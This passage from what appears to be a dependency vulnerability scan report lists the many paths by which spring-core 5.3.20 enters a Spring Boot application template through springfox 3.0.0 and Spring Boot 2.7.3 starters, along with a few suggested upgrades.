  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-aop@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.4.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-jdbc@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-json@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
